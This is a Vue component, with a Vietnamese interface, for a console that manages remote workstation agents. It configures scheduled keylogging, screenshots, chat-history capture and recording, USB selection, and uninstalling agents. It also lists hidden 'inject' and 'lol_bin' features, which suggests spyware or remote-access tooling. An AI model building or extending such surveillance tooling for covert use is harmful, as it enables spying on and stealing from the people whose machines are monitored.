<template>
  <div class="bg-base-100 space-y-4 p-4">
    <div class="fieldset p-4 shadow transition-all hover:shadow-md">
      <legend class="fieldset-legend text-lg">Tính năng</legend>
      <div class="grid grid-cols-1 sm:grid-cols-2 lg:grid-cols-4">
        <div
          v-for="t in client_detail_store.tabs.filter(
            (t) =>
              t.be_mapping && !t.disabled && !SETTINGS_HIDDEN.has(t.be_mapping),
          )"
          :key="t.be_mapping"
          :id="t.be_mapping"
          class="has-[input:not(:checked)]:text-base-content/60 tooltip flex items-center gap-4 p-2"
          :class="highlighted === t.be_mapping && 'animate-blink-bg-base-100'"
          :data-tip="
            t.disabled
              ? 'Tính năng này đang trong quá trình thử nghiệm nội bộ'
              : ''
          "
        >
          <input
            type="checkbox"
            class="checkbox"
            :checked="
              !t.disabled &&
              client_detail_store.client_detail?.permissions?.some(
                (p) => p === t.be_mapping,
              )
            "
            @change="(e) => toggle_current_permission(e, t.be_mapping)"
            :id="`setting__${t.be_mapping}`"
            :disabled="
              t.disabled || client_detail_store.client_detail?.uninstalled
            "
          />
          <label
            :for="`setting__${t.be_mapping}`"
            class="flex cursor-pointer items-baseline gap-1 text-base transition-all"
          >
            <i :class="twMerge(t.ico, 'opacity-80')"></i>
            <span class="truncate"> {{ t.value }} </span>
          </label>
        </div>
      </div>
      <div class="flex justify-end">
        <button
          class="btn btn-primary w-fit"
          :disabled="
            !has_changed || client_detail_store.client_detail?.uninstalled
          "
          @click="
            client_detail_store.update_permission(
              Array.from(current_permisison),
            )
          "
        >
          Lưu thay đổi
        </button>
      </div>
    </div>
    <div class="feature-settings grid grid-cols-1 gap-4 lg:grid-cols-2">
      <!-- Cài đặt ghi phím -->
      <fieldset class="fieldset p-4 shadow transition-all hover:shadow-md">
        <legend class="fieldset-legend">Ghi phím</legend>

        <label class="label">Bắt đầu sau (giây)</label>
        <input
          class="input"
          type="number"
          v-model="client_setting_store.keylogger_setting.start_after"
          @change="() => (client_setting_store.is_changed.key_logger = true)"
          :disabled="
            client_setting_store.loading.key_logger ||
            !client_setting_store.has_permission('key_logger') ||
            client_detail_store.client_detail?.uninstalled
          "
        />

        <label class="label">Lặp lại (giây)</label>
        <input
          class="input"
          type="number"
          v-model="client_setting_store.keylogger_setting.schedule"
          @change="() => (client_setting_store.is_changed.key_logger = true)"
          :disabled="
            client_setting_store.loading.key_logger ||
            !client_setting_store.has_permission('key_logger') ||
            client_detail_store.client_detail?.uninstalled
          "
        />

        <button
          class="btn btn-primary btn-outline mt-4"
          :disabled="
            client_setting_store.loading.key_logger ||
            !client_setting_store.has_permission('key_logger') ||
            !client_setting_store.is_changed.key_logger ||
            client_detail_store.client_detail?.uninstalled
          "
          @click="
            client_setting_store.save_schedule_setting(
              client_setting_store.keylogger_setting,
            )
          "
        >
          Lưu thông tin
        </button>
      </fieldset>

      <!-- Cài đặt chụp màn hình -->
      <fieldset class="fieldset p-4 shadow transition-all hover:shadow-md">
        <legend class="fieldset-legend">Chụp màn hình</legend>

        <label class="label">Bắt đầu sau (giây)</label>
        <input
          class="input"
          type="number"
          v-model="client_setting_store.screenshot_setting.start_after"
          @change="() => (client_setting_store.is_changed.screenshot = true)"
          :disabled="
            client_setting_store.loading.screenshot_setting ||
            !client_setting_store.has_permission('screenshot') ||
            client_detail_store.client_detail?.uninstalled
          "
        />

        <label class="label">Lặp lại (giây)</label>
        <input
          class="input"
          type="number"
          v-model="client_setting_store.screenshot_setting.schedule"
          @change="() => (client_setting_store.is_changed.screenshot = true)"
          :disabled="
            client_setting_store.loading.screenshot_setting ||
            !client_setting_store.has_permission('screenshot') ||
            client_detail_store.client_detail?.uninstalled
          "
        />

        <button
          class="btn btn-primary btn-outline mt-4"
          :disabled="
            client_setting_store.loading.screenshot_setting ||
            !client_setting_store.has_permission('screenshot') ||
            !client_setting_store.is_changed.screenshot ||
            client_detail_store.client_detail?.uninstalled
          "
          @click="
            client_setting_store.save_schedule_setting(
              client_setting_store.screenshot_setting,
            )
          "
        >
          Lưu thông tin
        </button>
      </fieldset>

      <!-- Cài đặt lịch sử chat -->
      <fieldset class="fieldset p-4 shadow transition-all hover:shadow-md">
        <legend class="fieldset-legend">Lịch sử chat</legend>

        <label class="label">Tần suất (giây)</label>
        <input
          class="input"
          type="number"
          v-model="client_setting_store.chat_history_setting.schedule"
          @change="() => (client_setting_store.is_changed.chat_history = true)"
          :disabled="
            client_setting_store.loading.chat_history ||
            !client_setting_store.has_permission('chat_history') ||
            client_detail_store.client_detail?.uninstalled
          "
        />

        <button
          class="btn btn-primary btn-outline mt-4"
          :disabled="
            client_setting_store.loading.chat_history ||
            !client_setting_store.has_permission('chat_history') ||
            !client_setting_store.is_changed.chat_history ||
            client_detail_store.client_detail?.uninstalled
          "
          @click="
            client_setting_store.save_schedule_setting(
              client_setting_store.chat_history_setting,
            )
          "
        >
          Lưu thông tin
        </button>
      </fieldset>
      <!-- Cài đặt bản ghi -->
      <fieldset class="fieldset p-4 shadow transition-all hover:shadow-md">
        <legend class="fieldset-legend">Bản ghi</legend>

        <label class="label">Bắt đầu sau (giây)</label>
        <input
          class="input"
          type="number"
          min="0"
          v-model="client_setting_store.record_setting.start_after"
          @change="() => (client_setting_store.is_changed.record = true)"
          :disabled="
            client_setting_store.loading.record ||
            !client_setting_store.has_permission('record') ||
            client_detail_store.client_detail?.uninstalled
          "
        />

        <label class="label">Lặp lại (giây)</label>
        <input
          class="input"
          type="number"
          min="0"
          v-model="client_setting_store.record_setting.schedule"
          @change="() => (client_setting_store.is_changed.record = true)"
          :disabled="
            client_setting_store.loading.record ||
            !client_setting_store.has_permission('record') ||
            client_detail_store.client_detail?.uninstalled
          "
        />

        <label class="label">Thời lượng ghi (giây)</label>
        <input
          class="input"
          type="number"
          min="1"
          v-model="client_setting_store.record_setting.duration"
          @change="() => (client_setting_store.is_changed.record = true)"
          :disabled="
            client_setting_store.loading.record ||
            !client_setting_store.has_permission('record') ||
            client_detail_store.client_detail?.uninstalled
          "
        />

        <label class="label">Chế độ</label>
        <select
          class="select"
          v-model="client_setting_store.record_setting.mode"
          @change="() => (client_setting_store.is_changed.record = true)"
          :disabled="
            client_setting_store.loading.record ||
            !client_setting_store.has_permission('record') ||
            client_detail_store.client_detail?.uninstalled
          "
        >
          <option value="auto">Tự động</option>
          <option value="manual">Thủ công</option>
        </select>

        <button
          class="btn btn-primary btn-outline mt-4"
          :disabled="
            client_setting_store.loading.record ||
            !client_setting_store.has_permission('record') ||
            !client_setting_store.is_changed.record ||
            client_detail_store.client_detail?.uninstalled
          "
          @click="
            client_setting_store.save_schedule_setting(
              client_setting_store.record_setting,
            )
          "
        >
          Lưu thông tin
        </button>
      </fieldset>
    </div>
    <!-- USB devices -->
    <fieldset class="fieldset p-4 shadow transition-all hover:shadow-md">
      <legend class="fieldset-legend">Thiết bị USB</legend>
      <div v-if="usb_loading" class="loading loading-spinner loading-sm" aria-label="Đang tải USB"></div>
      <div v-else-if="usb_error" class="flex items-center gap-3">
        <span class="text-error">{{ usb_error }}</span>
        <button class="btn btn-sm btn-outline" @click="load_usb_devices">Thử lại</button>
      </div>
      <div v-else-if="usb_devices.length === 0" class="text-base-content/70">
        Chưa có thiết bị USB được báo cáo
      </div>
      <div v-else class="space-y-3">
        <div class="flex justify-end">
          <button
            class="btn btn-sm btn-outline"
            :disabled="usb_saving || !usb_saved_selected || client_detail_store.client_detail?.uninstalled"
            @click="select_usb('')"
          >
            Bỏ chọn USB
          </button>
        </div>
        <div v-for="device in usb_devices" :key="device.id" class="rounded border border-base-300 p-3">
          <div class="font-medium">{{ device.name || device.id }}</div>
          <div v-if="device.name" class="text-xs text-base-content/60">{{ device.id }}</div>
          <div class="mt-2 flex flex-wrap gap-x-4 gap-y-2">
            <label v-for="letter in device.letter || []" :key="`${device.id}-${letter}`" class="flex items-center gap-2">
              <input
                v-model="usb_selected"
                class="radio radio-primary radio-sm"
                type="radio"
                name="selected-usb-letter"
                :value="letter"
                :disabled="usb_saving || device.status !== 'connected' || client_detail_store.client_detail?.uninstalled"
                @change="select_usb(letter)"
              />
              <span>{{ letter }}</span>
              <span v-if="usb_selected === letter" class="badge badge-primary badge-sm">Đang chọn</span>
              <span v-if="device.status && device.status !== 'connected'" class="badge badge-ghost badge-sm">Đã ngắt kết nối</span>
            </label>
          </div>
        </div>
      </div>
    </fieldset>
    <div
      class="flex items-end justify-between p-4 shadow transition-all hover:shadow-md"
    >
      <div>
        <div class="font-bold">Gỡ cài đặt máy trạm</div>
        <div class="text-base-content/80">
          Máy trạm sẽ không thể kết nối tới server
        </div>
      </div>
      <ConfirmUninstallClient :agent="client_detail_store.client_detail" />
    </div>
    <div
      class="flex items-end justify-between p-4 shadow transition-all hover:shadow-md"
    >
      <div>
        <div class="font-bold">Xóa máy trạm vĩnh viễn</div>
        <div class="text-base-content/80">
          Xóa hoàn toàn máy trạm khỏi hệ thống
        </div>
      </div>
      <ConfirmDeleteClient
        :agent="client_detail_store.client_detail"
        @deleted="router.push('/client')"
      />
    </div>

    <div
      class="flex items-end justify-between p-4 shadow transition-all hover:shadow-md"
    >
      <div>
        <div class="font-bold">Yêu cầu cập nhật</div>
        <div class="text-base-content/80">
          Kiểm tra các phiên bản có thể cập nhật
        </div>
      </div>
      <button
        class="btn btn-primary btn-outline"
        @click="openUpdateRequestModal"
      >
        Yêu cầu cập nhật
      </button>
    </div>
    <UpdateHistory :agentId="agent_id" />
  </div>
  <UpdateRequestModal ref="updateRequestModal" />
</template>

<script setup lang="ts">
import { axios_instance } from "@/api/api";
import { router } from "@/router/router";
import { twMerge } from "tailwind-merge";
import { computed, ref, watch } from "vue";
import { toast } from "vue3-toastify";
import { use_client_detail } from "../useClientDetail";
import ConfirmDeleteClient from "./ConfirmDeleteClient.vue";
import ConfirmUninstallClient from "./ConfirmUninstallClient.vue";
import UpdateHistory from "./UpdateHistory.vue";
import UpdateRequestModal from "./UpdateRequestModal.vue";
import { use_client_setting } from "./useClientSetting";

const client_setting_store = use_client_setting();
const client_detail_store = use_client_detail();

// Destinations that moved into the category menus. Their tab entries stay
// because the function catalog resolves routes through this list; only the
// "Tính năng" grid hides them.
const SETTINGS_HIDDEN = new Set<string>([
  "inject",
  "find-dml",
  "lol_bin",
]);
const current_permisison = ref<Set<string>>(
  new Set(client_detail_store.client_detail?.permissions),
);

const updateRequestModal = ref<InstanceType<typeof UpdateRequestModal> | null>(
  null,
);

const agent_id = router.currentRoute.value.params.client_id as string;
type usb_device = {
  id: string;
  name?: string;
  letter?: string[];
  status?: string;
};
const usb_devices = ref<usb_device[]>([]);
const usb_selected = ref("");
const usb_saved_selected = ref("");
const usb_loading = ref(false);
const usb_saving = ref(false);
const usb_error = ref("");
let usb_load_id = 0;

const load_usb_devices = async () => {
  const request_id = ++usb_load_id;
  const id = String(router.currentRoute.value.params.client_id || "");
  usb_loading.value = true;
  usb_error.value = "";
  try {
    const response = await axios_instance.post<{
      data: { devices: usb_device[]; selected_id: string };
    }>(`/api/v1/view/usb/?agent_id=${encodeURIComponent(id)}`);
    if (request_id !== usb_load_id) return;
    usb_devices.value = response.data.data.devices || [];
    usb_selected.value = response.data.data.selected_id || "";
    usb_saved_selected.value = usb_selected.value;
  } catch (error: any) {
    if (request_id !== usb_load_id) return;
    usb_error.value = error.response?.data?.message || error.response?.data?.error || "Không thể tải danh sách USB";
  } finally {
    if (request_id === usb_load_id) usb_loading.value = false;
  }
};

const select_usb = async (letter: string) => {
  const previous = usb_saved_selected.value;
  usb_saving.value = true;
  try {
    await axios_instance.post(
      `/api/v1/view/usb/select?agent_id=${encodeURIComponent(String(router.currentRoute.value.params.client_id))}`,
      { letter },
    );
    usb_selected.value = letter;
    usb_saved_selected.value = letter;
    toast.success(letter ? `Đã chọn USB ${letter}` : "Đã bỏ chọn USB");
  } catch (error: any) {
    usb_selected.value = previous;
    toast.error(error.response?.data?.message || error.response?.data?.error || "Không thể chọn USB");
  } finally {
    usb_saving.value = false;
  }
};

watch(
  () => router.currentRoute.value.params.client_id,
  () => load_usb_devices(),
  { immediate: true },
);

const toggle_current_permission = (e: Event, permission?: string) => {
  if (!permission || !e.target) return;
  const checked = (e.target as HTMLInputElement).checked;
  if (checked) current_permisison.value.add(permission);
  if (!checked) current_permisison.value.delete(permission);
};
const has_changed = computed(() => {
  return (
    JSON.stringify(Array.from(current_permisison.value)) !==
    JSON.stringify(client_detail_store.client_detail?.permissions)
  );
});

watch(
  () => [client_detail_store.client_detail?.permissions],
  () => {
    current_permisison.value = new Set(
      client_detail_store.client_detail?.permissions,
    );
  },
);
const highlighted = computed(() => router.currentRoute.value.query.highlighted);

const openUpdateRequestModal = () => {
  if (updateRequestModal.value?.modal) {
    updateRequestModal.value.modal.showModal();
  }
};
</script>

<style scoped>
.feature-settings > fieldset {
  display: flex;
  min-width: 0;
  flex-direction: column;
}

.feature-settings :is(.input, .select) {
  width: 100%;
}

.feature-settings :is(.input, .select):has(+ .btn) {
  margin-bottom: 1rem;
}

.feature-settings .btn {
  align-self: flex-end;
  margin-top: auto;
}
</style>
